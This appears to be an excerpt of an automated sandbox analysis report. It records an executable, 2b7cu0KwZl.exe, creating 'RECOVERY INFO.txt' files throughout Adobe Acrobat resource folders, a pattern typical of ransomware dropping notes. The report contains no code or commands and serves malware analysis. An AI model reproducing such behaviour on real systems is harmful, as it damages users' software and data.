Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txt	Jump to behavior
